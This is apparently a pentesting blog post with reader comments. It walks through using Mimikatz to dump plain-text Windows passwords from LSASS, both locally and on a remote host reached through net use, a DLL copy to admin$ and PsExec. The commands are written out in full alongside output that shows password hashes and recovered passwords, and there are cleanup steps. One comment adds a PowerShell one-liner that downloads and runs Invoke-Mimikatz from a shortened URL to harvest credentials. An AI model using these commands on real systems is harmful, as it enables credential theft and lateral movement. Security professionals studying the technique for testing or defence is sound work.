If you haven't been paying attention, Mimikatz is a slick tool that pulls plain-text passwords out of WDigest (explained below) interfaced through LSASS. There are a few other blogs describing mimikatz on the net, but this will hopefully provide more details about the components involved and ideas on how to use it. The tool itself and the download page is in French, so it makes it “fun” to use if you don’t speak french :)
Download
Mimikatz can be downloaded from:A couple of things to take into consideration:
- The tool has 32-bit and 64-bit versions – make sure you pick the correct version (systeminfo is your friend)
- You need to run it as admin (need debug privs)
- Needs a DLL called sekurlsa.dll in order to inject into lsass.exe and dump the hashes in clear text (important to know especially for a remote dumping)
Use Cases
The key feature of this tool that sets it apart from other tools is its ability to pull plain-text passwords from the system instead of just password hashes. If your intention is to stay within the Windows environment and pass the hash this may not be that big of a deal. However, if you are exploring the curious case of password reuse across different environments—the plain-text password can be quite useful. For example, you have compromised a “Good for Enterprise” server that has a web interface which is not tied into AD single sign on. It might be useful to have the Good admin’s plain-text password to try against the Good for Enterprise web interface. Additionally, unless you have significant computational power, you may not crack an NTLM password hash—thus pulling the plain-text proves useful once again.
What the heck is WDigest?
WDigest is a DLL first added in Windows XP that is used to authenticate users against HTTP Digest authentication and Simple Authentication Security Layer (SASL) exchanges. Both of these require the user’s plain-text password in order to derive the key to authenticate—thus why it is stored in plain-text.
Source: http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx
Running mimikatz
To run mimikatz you'll need
mimikatz.exe and sekurlsa.dll on the system you're targeting. Once you launch mimikatz.exe from the command line you'll be provided with an interactive prompt that will allow you to perform a number of different commands. In the next sections we'll go over the following commands:privilege::debuginject::process lsass.exe sekurlsa.dll@getLogonPasswords
Running locally (Windows 2008 R2 – 64-bit)
To enter the interactive command mimikatz command prompt, just launch the executable:
mimikatz.exe
You'll be presented with a banner and a prompt:
C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe
mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz #
Next, we'll need to enable debug mode with the
privilege::debug command:mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz #
Then we'll need to inject
sekurlsa.dll into LSASS, but using the inject::process command:mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 448
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz #
Finally, we'll pull any available login passwords using the
@getLogonPasswords macro:mimikatz # @getLogonPasswords
Authentification Id : 0;126660
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : FS
msv1_0 : lm{ f67ce55ac831223dc187b8085fe1d9df }, ntlm{ 161cff084477fe596a5db81874498a24 }
wdigest : 1qaz@WSX
tspkg : 1qaz@WSX
--SNIP--
mimikatz # exit
Fermeture du canal de communication
You should see one entry for each user. Note the
msv1_0 and wdigest fields. The former contains the LM and NTLM hashes for the Administrator user (defined by "Utilisateur principal") and the later contains the WDigest entry, which is the plain text password of the user!Running Remotely (Windows 2003 – 32-bit)
Running mimikatz remotely, is more or less the same, but if you'll need to establish a connection on the system first. We'll do that here by using the built in Windows
net commands and psexec. We'll need to map the target remotely in order to copy over
sekurlsa.dll. First we'll establish a connection to the servers admin$ share. Note that this will require pre-existing access to the server, so you'll need a valid credential to map the share:net use \\169.254.73.91\admin$ /u:169.254.73.91\mimidemo
Then just copy over
sekurlsa.dll:C:\Users\Administrator\Desktop\mimikatz_trunk\tools> copy ..\Win32\sekurlsa.dll \\169.254.73.91\admin$\system32
Finally, we'll use psexec to run mimikatz:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz #
Now at our mimikatz prompt, we can just do the same as if we running it locally:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privil+¿ge : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
Attente de connexion du client...
Serveur connect+¬ +á un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des donn+¬es de s+¬curit+¬s dans LSASS
mimikatz # @getLogonPasswords
--SNIP--
Authentification Id : 0;184995
Package d'authentification : NTLM
Utilisateur principal : PowerAccnt
Domaine d'authentification : SWITCH
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 37**********************89 }
wdigest : j************************\ <- Service account with Admin Privileges and suuuper long password - Ouch
Authentification Id : 0;62703
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : SWITCH
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 4***************************d }
wdigest : ******************** <- Admin account with suuuper long password - Ouch
--SNIP--
mimikatz # exit
Fermeture du canal de communication
Cleanup
To delete sekurlsa.dll from the remote system:
del \\169.254.73.91\admin$\system32\sekurlsa.dll
Then just double check its not there with:
dir \\169.254.73.91\admin$\system32\sekurlsa.dll
Volume in drive \\169.254.73.91\admin$ has no label.
Volume Serial Number is 34C7-0000
Directory of \\169.254.73.91\admin$\system32
File Not Found
Finally, we can remove our connection to the server:
net use \\169.254.73.91\admin$ /del
\\169.254.73.91\admin$ was deleted successfully.
Tony,
ReplyDeleteThank you for the post. I was wondering if you have had any issues deleting the sekurlsa.dll file after injecting? I am testing this exact scenario and have successfully dumped the information but am unable to delete the injected .dll --- obviously because it is in use.
I am trying to figure out a work around...
I had to remotely kill the process. All is well.
ReplyDeleteThanks for posting your problem and your solution. :) For others out there that may experience the same issue, the following commands should help you kill the hanging process remotely:
ReplyDeleteKill by PID:
tasklist /S {IP.Ad.dr.ess} [/U domain\username]
taskkill /F /PID {PID} /S {IP.Ad.dr.ess} [/U domain\username]
Kill by image name:
taskkill /F /IM mimikatz.exe /S {IP.Ad.dr.ess} [/U domain\username]
it's just maybe because you don't unload sekurlsa.dll ( use "@"), or a proper "exit" in mimikatz (automatic unload...).
ReplyDeleteThanks! Actually that was there in the original version of this blog post but I somehow cut it out in transforming it from .txt to HTML. Fixed it above.. btw - great tool man!
DeleteI am a beginner but i need to ask one thing.
ReplyDeleteIt returns passwords of the logged in user, right?
I opened a session using meterpreter, got the shell and ran it, and got passwords of logged in user.
But what if i need passwords of other accounts as well? How do i do that, given user is logged in using his account only!
This is "just" for logged in users ;) (or just logged in before)
DeleteAlso any service accounts that have been configured, so for instance on a server you might hit a nice domain admin account which is being used for backups... :D
DeleteI am trying this for the first time. At the final stage I am getting
ReplyDelete"Méthode 'getLogonPasswords' introuvable !
which translates as method 'getLogonPasswords' found
but no passwords are displayed.
Your help/thoughts would be appreciated.
Ger
Just type this into PowerShell as an administrator:
ReplyDeletepowershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
This will give you the user password in plaintext in one command. Also, add this onto the end of the powershell script above:
>> C:\Output.txt
This will save the output to a file, making it even easier to collect your data. You can always change the path to make it easier to collect results, even upload to fpt etc!
thanks, seems nice, no need to download mimikatz then, got it. but unfortunatly, i can not make the privilege::debug to the invoke option. any idea how to ?
Delete